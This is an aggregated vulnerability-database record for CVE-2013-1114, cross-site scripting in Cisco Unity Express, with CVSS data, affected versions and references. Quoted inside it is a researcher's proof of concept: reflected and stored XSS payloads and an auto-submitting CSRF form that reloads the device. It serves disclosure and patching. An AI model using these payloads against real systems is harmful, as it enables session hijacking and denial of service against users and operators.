Details of VAR-201302-0171

ID

VAR-201302-0171

CVE

CVE-2013-1114

TITLE

Cisco Unity Express Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2013-001569

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in Cisco Unity Express before 8.0 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka Bug ID CSCud87527. Cisco Unity Express Contains a cross-site scripting vulnerability. The problem is Bug ID CSCud87527 It is a problem.By any third party Web Script or HTML May be inserted. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. These issues are being tracked by Cisco Bug ID CSCud87527. Cisco Unity is an advanced unified communications solution for enterprise-level organizations that can provide powerful messaging services and intelligent voice messaging services. # Exploit Title: Cisco Unity Express Multiple Vulnerabilities # Reported: December 2012 # Disclosed: February 2013 # Author: Jacob Holcomb of Independent Security Evaluators # CVE: XSS - CVE-2013-1114 and CSRF - CVE-2013-1120 # http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html Cisco Advisory http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114 http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120 Proof of Concept XSS - CVE-2013-1114: GET: Reflective XSS & Info disclosure http://X.X.X.X/Web/SA2/ScriptList.do?gui_pagenotableData=><script>alert(42)</script> Information Disclosure Location: /Web/WEB-INF/screens/main.jsp Error Location: /Web/WEB-INF/screens/prompts/ListScripts.jsp Internal Servlet Error: javax.servlet.ServletException: invalid character at position 1 in > org.apache.jasper.runtime.PageContextImpl.handlePageException (Unknown Source) WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:2245) org.apache.jasper.runtime.HttpJspBase.service (Unknown Source) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source) org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source) java.security.AccessController.doPrivileged (AccessController.java:273) org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source) org.apache.jasper.runtime.PageContextImpl.include (Unknown Source) WEB_0002dINF.screens.main._jspService (main.java:396) org.apache.jasper.runtime.HttpJspBase.service (Unknown Source) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source) org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source) java.security.AccessController.doPrivileged (AccessController.java:273) org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source) org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759) org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596) com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157) org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492) javax.servlet.http.HttpServlet.service (HttpServlet.java) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.core.ContextManager.internalService (Unknown Source) org.apache.tomcat.core.ContextManager.service (Unknown Source) org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source) org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source) org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source) java.lang.Thread.run (Thread.java:777) Root cause: java.lang.NumberFormatException: invalid character at position 1 in > java.lang.Throwable. (Throwable.java:166) java.lang.Integer.parseInt (Integer.java:775) java.lang.Integer.parseInt (Integer.java:262) com.cisco.aesop.gui.taglibs.PagingTableTag.doAfterBody (PagingTableTag.java:274) WEB_0002dINF.screens.prompts.ListScripts._jspService (ListScripts.java:1903) org.apache.jasper.runtime.HttpJspBase.service (Unknown Source) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.doInclude (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.access$000 (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source) org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source) java.security.AccessController.doPrivileged (AccessController.java:273) org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.include (Unknown Source) org.apache.jasper.runtime.PageContextImpl.include (Unknown Source) WEB_0002dINF.screens.main._jspService (main.java:396) org.apache.jasper.runtime.HttpJspBase.service (Unknown Source) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.doForward (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.access$100 (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl$RDIAction.run (Unknown Source) org.apache.tomcat.util.compat.Jdk12Support$PrivilegedProxy.run (Unknown Source) java.security.AccessController.doPrivileged (AccessController.java:273) org.apache.tomcat.util.compat.Jdk12Support.doPrivileged (Unknown Source) org.apache.tomcat.facade.RequestDispatcherImpl.forward (Unknown Source) org.apache.struts.action.ActionServlet.processActionForward (ActionServlet.java:1759) org.apache.struts.action.ActionServlet.process (ActionServlet.java:1596) com.cisco.aesop.vmgui.framework.WebController.process (WebController.java:157) org.apache.struts.action.ActionServlet.doGet (ActionServlet.java:492) javax.servlet.http.HttpServlet.service (HttpServlet.java) javax.servlet.http.HttpServlet.service (HttpServlet.java) org.apache.tomcat.facade.ServletHandler.doService (Unknown Source) org.apache.tomcat.core.Handler.invoke (Unknown Source) org.apache.tomcat.core.Handler.service (Unknown Source) org.apache.tomcat.facade.ServletHandler.service (Unknown Source) org.apache.tomcat.core.ContextManager.internalService (Unknown Source) org.apache.tomcat.core.ContextManager.service (Unknown Source) org.apache.tomcat.modules.server.Http10Interceptor.processConnection (Unknown Source) org.apache.tomcat.util.net.TcpWorkerThread.runIt (Unknown Source) org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run (Unknown Source) java.lang.Thread.run (Thread.java:777) POST: Persistent XSS http://X.X.X.X/Web/SA3/AddHoliday.do POST Data: holiday.description=><script>alert(42)</script>&submitType=ADD CSRF - CVE-2013-1120: <html>  <head> <title>Reload Cisco Unity Express CSRF</title> </head> <body> <form name="CUEreload" action="http://X.X.X.X/Web/SA/SaveConfiguration.do" method="post"> <input type="hidden" name="submitType" value="RELOAD"/> </form> <script> document.CUEreload.submit(); </script> </body> </html> . ---------------------------------------------------------------------- The final version of the CSI 6.0 has been released. Find out why this is not just another Patch Management solution: http://secunia.com/blog/325/ ---------------------------------------------------------------------- TITLE: Cisco Unity Express Cross-Site Scripting and Request Forgery Vulnerabilities SECUNIA ADVISORY ID: SA52045 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/52045/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=52045 RELEASE DATE: 2013-02-04 DISCUSS ADVISORY: http://secunia.com/advisories/52045/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/52045/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=52045 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Some vulnerabilities have been reported in Cisco Unity Express, which can be exploited by malicious people to conduct cross-site scripting and request forgery attacks. 1) Certain unspecified input is not properly sanitised before being returned to the user. 2) The application allows users to perform certain actions via HTTP requests without performing proper validity checks to verify the requests. This can be exploited to perform certain actions when a logged-in user visits a specially crafted web page. The vulnerabilities are reported in versions prior to 8.0. SOLUTION: Upgrade to version 8.0 or later (please contact the vendor for more information). PROVIDED AND/OR DISCOVERED BY: The vendor credits Jacob Holcomb, Independent Security Evaluators ORIGINAL ADVISORY: Cisco: http://tools.cisco.com/security/center/viewAlert.x?alertId=28044 http://tools.cisco.com/security/center/viewAlert.x?alertId=28045 http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114 http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1120 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Trust: 2.16

sources: NVD: CVE-2013-1114 // JVNDB: JVNDB-2013-001569 // BID: 57677 // VULHUB: VHN-61116 // PACKETSTORM: 120068 // PACKETSTORM: 120043

AFFECTED PRODUCTS

vendor:	cisco	model:	unity express software	scope:	eq	version:	2.1	Trust: 1.6
vendor:	cisco	model:	unity express software	scope:	eq	version:	2.0	Trust: 1.6
vendor:	cisco	model:	unity express software	scope:	eq	version:	1.1.1	Trust: 1.6
vendor:	cisco	model:	unity express software	scope:	eq	version:	2.2.2	Trust: 1.6
vendor:	cisco	model:	unity express software	scope:	eq	version:	3.1	Trust: 1.6
vendor:	cisco	model:	unity express software	scope:	eq	version:	2.1.2	Trust: 1.6
vendor:	cisco	model:	unity express software	scope:	eq	version:	2.2	Trust: 1.6
vendor:	cisco	model:	unity express software	scope:	eq	version:	2.1.1	Trust: 1.6
vendor:	cisco	model:	unity express software	scope:	eq	version:	1.1.2	Trust: 1.6
vendor:	cisco	model:	unity express software	scope:	eq	version:	3.0	Trust: 1.0
vendor:	cisco	model:	unity express software	scope:	eq	version:	7.1	Trust: 1.0
vendor:	cisco	model:	unity express software	scope:	eq	version:	7.2	Trust: 1.0
vendor:	cisco	model:	unity express software	scope:	eq	version:	7.3	Trust: 1.0
vendor:	cisco	model:	unity express software	scope:	eq	version:	2.3	Trust: 1.0
vendor:	cisco	model:	unity express software	scope:	lte	version:	7.4	Trust: 1.0
vendor:	cisco	model:	unity express software	scope:	eq	version:	7.0	Trust: 1.0
vendor:	cisco	model:	unity express software	scope:	eq	version:	3.2	Trust: 1.0
vendor:	cisco	model:	unity express software	scope:	lt	version:	8.0	Trust: 0.8
vendor:	cisco	model:	unity express software	scope:	eq	version:	7.4	Trust: 0.6

sources: JVNDB: JVNDB-2013-001569 // CNNVD: CNNVD-201302-080 // NVD: CVE-2013-1114

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2013-1114
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2013-1114
value:	MEDIUM
Trust: 0.8
CNNVD:	CNNVD-201302-080
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-61116
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2013-1114
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
VULHUB:	VHN-61116
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: VULHUB: VHN-61116 // JVNDB: JVNDB-2013-001569 // CNNVD: CNNVD-201302-080 // NVD: CVE-2013-1114

PROBLEMTYPE DATA

problemtype:

CWE-79

Trust: 1.9

sources: VULHUB: VHN-61116 // JVNDB: JVNDB-2013-001569 // NVD: CVE-2013-1114

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201302-080

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 120043 // CNNVD: CNNVD-201302-080

CONFIGURATIONS

sources: JVNDB: JVNDB-2013-001569

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-61116

PATCH

title:

Cisco Unity Express Cross Site Scripting Vulnerabilities

url:

http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-1114

Trust: 0.8

sources: JVNDB: JVNDB-2013-001569

EXTERNAL IDS

db:	NVD	id:	CVE-2013-1114	Trust: 3.0
db:	JVNDB	id:	JVNDB-2013-001569	Trust: 0.8
db:	SECUNIA	id:	52045	Trust: 0.8
db:	CNNVD	id:	CNNVD-201302-080	Trust: 0.7
db:	CISCO	id:	20130201 CISCO UNITY EXPRESS CROSS SITE SCRIPTING VULNERABILITIES	Trust: 0.6
db:	BID	id:	57677	Trust: 0.4
db:	SEEBUG	id:	SSVID-78172	Trust: 0.1
db:	EXPLOIT-DB	id:	24449	Trust: 0.1
db:	VULHUB	id:	VHN-61116	Trust: 0.1
db:	PACKETSTORM	id:	120068	Trust: 0.1
db:	PACKETSTORM	id:	120043	Trust: 0.1

sources: VULHUB: VHN-61116 // BID: 57677 // JVNDB: JVNDB-2013-001569 // PACKETSTORM: 120068 // PACKETSTORM: 120043 // CNNVD: CNNVD-201302-080 // NVD: CVE-2013-1114

REFERENCES

url:	http://tools.cisco.com/security/center/content/ciscosecuritynotice/cve-2013-1114	Trust: 1.9
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1114	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-1114	Trust: 0.8
url:	http://secunia.com/advisories/52045	Trust: 0.6
url:	http://www.cisco.com/en/us/products/sw/voicesw/ps5520/index.html	Trust: 0.3
url:	http://tools.cisco.com/security/center/content/ciscosecuritynotice/cve-2013-1120	Trust: 0.2
url:	http://x.x.x.x/web/sa3/addholiday.do	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-1114	Trust: 0.1
url:	http://infosec42.blogspot.com/2013/02/cisco-unity-express-vulnerabilites.html	Trust: 0.1
url:	http://x.x.x.x/web/sa/saveconfiguration.do"	Trust: 0.1
url:	http://x.x.x.x/web/sa2/scriptlist.do?gui_pagenotabledata=><script>alert(42)</script>	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2013-1120	Trust: 0.1
url:	http://tools.cisco.com/security/center/viewalert.x?alertid=28045	Trust: 0.1
url:	http://secunia.com/advisories/52045/	Trust: 0.1
url:	http://tools.cisco.com/security/center/viewalert.x?alertid=28044	Trust: 0.1
url:	http://secunia.com/vulnerability_intelligence/	Trust: 0.1
url:	http://secunia.com/advisories/secunia_security_advisories/	Trust: 0.1
url:	http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/	Trust: 0.1
url:	http://secunia.com/advisories/52045/#comments	Trust: 0.1
url:	http://secunia.com/vulnerability_scanning/personal/	Trust: 0.1
url:	http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org	Trust: 0.1
url:	http://secunia.com/blog/325/	Trust: 0.1
url:	https://ca.secunia.com/?page=viewadvisory&vuln_id=52045	Trust: 0.1
url:	http://secunia.com/advisories/about_secunia_advisories/	Trust: 0.1

sources: VULHUB: VHN-61116 // BID: 57677 // JVNDB: JVNDB-2013-001569 // PACKETSTORM: 120068 // PACKETSTORM: 120043 // CNNVD: CNNVD-201302-080 // NVD: CVE-2013-1114

CREDITS

Jacob Holcomb of Independent Security Evaluators

Trust: 0.3

sources: BID: 57677

SOURCES

db:	VULHUB	id:	VHN-61116
db:	BID	id:	57677
db:	JVNDB	id:	JVNDB-2013-001569
db:	PACKETSTORM	id:	120068
db:	PACKETSTORM	id:	120043
db:	CNNVD	id:	CNNVD-201302-080
db:	NVD	id:	CVE-2013-1114

LAST UPDATE DATE

2025-04-11T23:07:17.835000+00:00

SOURCES UPDATE DATE

db:	VULHUB	id:	VHN-61116	date:	2013-02-14T00:00:00
db:	BID	id:	57677	date:	2013-02-01T00:00:00
db:	JVNDB	id:	JVNDB-2013-001569	date:	2013-02-15T00:00:00
db:	CNNVD	id:	CNNVD-201302-080	date:	2013-02-18T00:00:00
db:	NVD	id:	CVE-2013-1114	date:	2025-04-11T00:51:21.963

SOURCES RELEASE DATE

db:	VULHUB	id:	VHN-61116	date:	2013-02-13T00:00:00
db:	BID	id:	57677	date:	2013-02-01T00:00:00
db:	JVNDB	id:	JVNDB-2013-001569	date:	2013-02-15T00:00:00
db:	PACKETSTORM	id:	120068	date:	2013-02-05T23:20:12
db:	PACKETSTORM	id:	120043	date:	2013-02-04T06:43:21
db:	CNNVD	id:	CNNVD-201302-080	date:	2013-02-07T00:00:00
db:	NVD	id:	CVE-2013-1114	date:	2013-02-13T23:55:01.227